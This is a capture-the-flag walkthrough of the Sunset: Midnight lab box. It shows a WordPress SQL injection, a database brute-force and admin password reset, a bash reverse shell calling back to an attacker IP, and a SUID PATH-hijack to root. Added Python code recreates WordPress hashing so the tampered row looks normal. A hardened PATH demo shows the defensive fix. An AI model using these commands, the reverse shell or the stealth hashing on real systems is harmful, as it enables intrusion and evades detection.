Another box. Another WordPress install. And another reminder why enumeration > assumptions. Let’s break down Sunset: Midnight step by step.
Nmap Scan
Started with a full TCP scan.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
| 256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_ 256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3306/tcp open mysql MariaDB 5.5.5-10.3.22
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
| Thread ID: 14
| Capabilities flags: 63486
| Some Capabilities: SupportsCompression, Speaks41ProtocolNew, Support41Auth, ConnectWithDatabase, FoundRows, InteractiveClient, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsTransactions, SupportsLoadDataLocal, ODBCClient, Speaks41ProtocolOld, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 9H@ExPf0XN\efP>%;:Ob
|_ Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web Enumeration (Port 80)
Visiting the site revealed:

- Default WordPress installation
- User: admin
- Plugin: simple-poll-master
- Version: 1.5.0
At first glance, nothing obvious. But after researching the plugin version, I found that version 1.4.1 had a known SQL injection — and reports suggested 1.5.0 was also vulnerable.

The vulnerable endpoint:
/wp-admin/admin-ajax.php
With parameter:
action=spAjaxResults&pollid=2
SQL Injection with sqlmap
sqlmap -u "http://sunset-midnight/wp-admin/admin-ajax.php" \
--data="action=spAjaxResults&pollid=2" \
-D wordpress_db --tables --batch

It worked — but extraction was slow. Since MySQL (MariaDB) was exposed on port 3306, I pivoted.
MySQL Enumeration (Port 3306)
After brute-forcing valid root credentials for the database with hydra, I logged in directly to MariaDB.

Listing databases:
show databases;
Found:
- wordpress_db
Checking users:
select user, password from mysql.user;
Then inside WordPress DB:
select user_login, user_pass from wp_users;
Found:
- admin user
- WordPress password hash
Cracking hashes didn’t work. But then I realized: I was root in the database. Instead of cracking — just change it.
UPDATE wordpress_db.wp_users
SET user_pass = MD5('Password123!')
WHERE user_login = 'admin';
WordPress still accepts a legacy 32-character MD5 hash in user_pass: wp_check_password() compares it against md5() of the submitted password and, on success, rehashes it into its own phpass ($P$) format. Logged in successfully as admin.

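Relying on the MD5 fallback works, but it leaves a 32-character hash in wp_users until the next login, which stands out in a table full of $P$ hashes. The following is an added example (not code from the original writeup or from WordPress) that reproduces WordPress's portable phpass scheme in Python, so the reset row looks like every other one, and mirrors the MD5-fallback check described above. The UPDATE statement it builds assumes the database and table names from the writeup (wordpress_db.wp_users); the 6-byte salt passed in the usage line is a constructed value for repeatability, a real run should use the default os.urandom() salt.

```python
"""WordPress-compatible phpass ("$P$") hashing, written for this example.

Implements the portable hash from phpass as WordPress uses it
(PasswordHash(8, true)): 2**8 MD5 rounds over salt+password, encoded with
phpass's own base64 alphabet.
"""
import hashlib
import hmac
import os
from typing import Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
WP_COST_LOG2 = 8  # WordPress default: 1 << 8 = 256 MD5 iterations


def _encode64(data: bytes, count: int) -> str:
    """phpass's base64 variant (not RFC 4648): little-endian 6-bit groups."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def _crypt_private(password: bytes, setting: str) -> str:
    """Core phpass loop: setting is '$P$' + cost char + 8 salt chars."""
    count = 1 << ITOA64.index(setting[3])
    salt = setting[4:12].encode()
    digest = hashlib.md5(salt + password).digest()
    for _ in range(count):
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest, 16)


def wp_hash_password(password: str, salt_bytes: Optional[bytes] = None) -> str:
    """Return a 34-char '$P$B...' hash exactly as WordPress would store it."""
    if salt_bytes is None:
        salt_bytes = os.urandom(6)  # 6 raw bytes -> 8 salt characters
    cost_char = ITOA64[min(WP_COST_LOG2 + 5, 30)]  # 'B' for cost 8
    setting = "$P$" + cost_char + _encode64(salt_bytes, 6)
    return _crypt_private(password.encode(), setting)


def legacy_md5(password: str) -> str:
    """The pre-phpass WordPress format: plain hex MD5 of the password."""
    return hashlib.md5(password.encode()).hexdigest()


def wp_check_password(password: str, stored: str) -> bool:
    """Mirror of wp_check_password(): <=32 chars means legacy MD5, else phpass."""
    if len(stored) <= 32:
        return hmac.compare_digest(legacy_md5(password), stored)
    if not stored.startswith("$P$") or len(stored) != 34:
        return False
    return hmac.compare_digest(_crypt_private(password.encode(), stored), stored)


def reset_sql(user_login: str, new_password: str) -> str:
    """Build the same UPDATE as the writeup, but with a native phpass hash.

    The hash only contains '$' and ITOA64 characters, so it needs no quoting;
    user_login is operator-chosen here, not untrusted input.
    """
    return (
        "UPDATE wordpress_db.wp_users SET user_pass = '%s' WHERE user_login = '%s';"
        % (wp_hash_password(new_password), user_login)
    )


if __name__ == "__main__":
    # Constructed salt for a repeatable demo; omit salt_bytes for real use.
    h = wp_hash_password("Password123!", salt_bytes=b"\x00\x01\x02\x03\x04\x05")
    print(h, wp_check_password("Password123!", h))
    print(reset_sql("admin", "Password123!"))
```

Paste the printed UPDATE into the MariaDB session in place of the MD5 variant; wp_check_password() shows why both forms log you in, and why the MD5 one is the noisier of the two.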
Gaining RCE via WordPress
Editing the theme directly failed:

However, modifying an installed plugin worked:

I injected a simple reverse shell and triggered it via the browser:

bash -c "bash -i >& /dev/tcp/<attacker_ip>/9001 0>&1"
# URL-encoded form, with the attacker IP filled in
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.225%2F9001%200%3E%261%22

Got a shell.
Lateral Movement – Credential Reuse
While enumerating, I discovered that user jose reused credentials. SSH access worked with the reused password. Always try credential reuse — especially after database compromise.


Privilege Escalation
While performing standard enumeration (linpeas, manual checks), I found:

Permissions:
-rwsr-sr-x 1 root root 16768 Jul 18 2020 /usr/bin/status
A root-owned binary with the SUID (and SGID) bit set: whatever it executes runs with root's effective UID, no matter who invokes it.
Analyzing the Binary
Using strings:
strings /usr/bin/status
Revealed:
service ssh status
system()
The binary calls:
service ssh status
But it does not use an absolute path. system() hands that string to /bin/sh -c, and the shell resolves service through whatever $PATH it inherited from the user running the binary. Classic PATH hijacking opportunity.
Exploiting PATH Hijacking
Create a fake service binary (the -p flag matters: without it bash drops the effective UID back to the real UID when they differ, and the shell would be unprivileged):
printf '#!/bin/bash\n/bin/bash -p\n' > /tmp/service
chmod +x /tmp/service
Prepend /tmp to PATH:
export PATH=/tmp:$PATH
Run the vulnerable binary:
/usr/bin/status
Root shell:

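To make the resolution step concrete, here is an added example (not the box's binary, and not code from the original writeup) that stands in for /usr/bin/status with Python's subprocess.run(..., shell=True), which is the same /bin/sh -c invocation that system(3) performs. It plants a fake service script in a temporary directory, puts that directory first in PATH, and shows that the relative command picks it up while a variant that resolves service only against a hard-coded trusted PATH does not. The fake script prints a marker instead of spawning a shell so the outcome can be checked without root; the trusted PATH value is an assumption for the example.

```python
"""PATH hijacking demo: relative command in system() vs. a fixed lookup path.

Written for this example. vulnerable_status() mimics the writeup's
/usr/bin/status; hardened_status() is what the binary should have done.
"""
import os
import shutil
import subprocess
import tempfile

# Assumed trusted search path a hardened SUID binary would hard-code.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def plant_fake_service(workdir: str) -> str:
    """Create <workdir>/service that prints HIJACKED instead of doing its job.

    On the box this script would run `/bin/bash -p`; here it only prints a
    marker so the result is observable without privileges.
    """
    path = os.path.join(workdir, "service")
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho HIJACKED\n")
    os.chmod(path, 0o755)
    return path


def vulnerable_status(caller_path: str) -> str:
    """Equivalent of system("service ssh status") in /usr/bin/status.

    /bin/sh walks the PATH it inherits from the caller, so the caller decides
    which 'service' runs. Under a SUID binary that decision is made as root.
    """
    result = subprocess.run(
        "service ssh status", shell=True, env={"PATH": caller_path},
        capture_output=True, text=True, timeout=10,
    )
    return result.stdout.strip()


def hardened_status(caller_path: str) -> str:
    """Same job, but 'service' is resolved only in TRUSTED_PATH.

    The caller's PATH is ignored entirely (it is accepted only to show it has
    no effect). If no trusted 'service' exists, refuse rather than fall back.
    """
    real = shutil.which("service", path=TRUSTED_PATH)
    if real is None:
        return "NO-TRUSTED-SERVICE"
    result = subprocess.run(
        [real, "ssh", "status"], env={"PATH": TRUSTED_PATH},
        capture_output=True, text=True, timeout=10,
    )
    return (result.stdout + result.stderr).strip()


def demo() -> dict:
    """Plant the fake binary, prepend its directory to PATH, run both variants."""
    with tempfile.TemporaryDirectory() as workdir:
        plant_fake_service(workdir)
        hijacked_path = workdir + os.pathsep + os.environ.get("PATH", TRUSTED_PATH)
        return {
            "vulnerable": vulnerable_status(hijacked_path),
            "hardened": hardened_status(hijacked_path),
        }


if __name__ == "__main__":
    for name, output in demo().items():
        print("%-10s -> %s" % (name, output))
```

The vulnerable variant always reports HIJACKED; the hardened one either runs the real service from a fixed location or refuses. In C the same fix is an absolute path in the system() string plus a setenv("PATH", ...) before the call, and, better still, execve() of the fixed path with a controlled environment instead of a shell.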
Lessons Learned
This box highlights several important concepts:
- Exposed databases drastically increase attack surface.
- SQL injection doesn’t always need full data extraction — sometimes logic abuse is faster.
- If you control the database, you control the application.
- Credential reuse is still one of the most reliable privilege escalation techniques.
- SUID binaries must use absolute paths.
- PATH hijacking remains a classic but powerful attack vector.